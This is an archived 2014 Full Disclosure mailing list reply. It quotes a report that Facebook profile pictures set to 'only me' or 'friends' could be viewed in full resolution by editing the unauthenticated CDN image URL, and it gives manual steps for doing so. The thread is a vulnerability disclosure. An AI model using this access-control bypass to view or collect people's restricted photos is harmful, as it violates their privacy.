Full Disclosure mailing list archives
Re: Access anyone's Facebook "profile picture" in full resolution regardless of the ACL restriction
From: Mario Vilas <mvilas () gmail com>
Date: Tue, 1 Apr 2014 20:39:21 +0200
I haven't verified, but isn't this how browser plugins like the following work? https://chrome.google.com/webstore/detail/photo-zoom-for-facebook/elioihkkcdgakfbahdoddophfngopipi Haven't tried it myself, but it seems reasonable to think so. On Tue, Apr 1, 2014 at 11:59 AM, Bipin Gautam <bipin.gautam () gmail com>wrote:
Hi List, I felt like writing / pointing this minor issue, as it as its "Facebook" ... This issue is due to the way facebook pictures are stored in CDN without authentication mechanism, during accessing it. (which would be way technically complicated to implement it) Also, it is a Facebook feature that... if you have full path of an image, you can pass it to anyone over the internet which they can access it directly (and the facebook user should not have unrealistic expectation to privacy. Hence, if someone can access an image they can save/email it to others, anyway.) POC: ( Please TEST it in a real profile, real world example and it should work. I obviously changed the URL, POC below, to gibberish "6549_16544614736_444444875_n.jpg" ) STEPS: You could try this by : - changing your own facebook profile picture viewable to "only me", then bookmark your own Facebook profile and logout and clear cache. - or then try different browser with your own profile from bookmark, without logging in to facebook! - or pass your FB profile to a friend, with the following instruction. ___ - then, in your browser, "Right click the Facebook profile image" that you want to access in full resolution (that have ACL as access to "only me" or "friends" ) > click "Copy image location" > paste it in notepad sample url you will get (this link below is broken) :[1] https://fbcdn-profile-a.akamaihd.net/hprofile-ak-frc3/t1.0-1/c0.18.160.160/p160x160/6549_16544614736_444444875_n.jpg to remove from [1]: "/c0.18.160.160/p160x160" (part; in other cases, the url structure may be different, you just have to find and remove this middle part...) final modified url from above, which you can access the profile picture in full resolution via your browser : https://fbcdn-profile-a.akamaihd.net/hprofile-ak-frc3/t1.0-1/6549_16544614736_444444875_n.jpg Respectfully, -bipin _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
-- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- Access anyone's Facebook "profile picture" in full resolution regardless of the ACL restriction Bipin Gautam (Apr 01)
- Re: Access anyone's Facebook "profile picture" in full resolution regardless of the ACL restriction Mario Vilas (Apr 01)
- Re: Access anyone's Facebook "profile picture" in full resolution regardless of the ACL restriction Źmicier Januszkiewicz (Apr 02)
- Re: Access anyone's Facebook "profile picture" in full resolution regardless of the ACL restriction illwill (Apr 03)
- <Possible follow-ups>
- Re: Access anyone's Facebook "profile picture" in full resolution regardless of the ACL restriction Philip Whitehouse (Apr 01)
- Re: Access anyone's Facebook "profile picture" in full resolution regardless of the ACL restriction Philip Whitehouse (Apr 01)
(Thread continues...)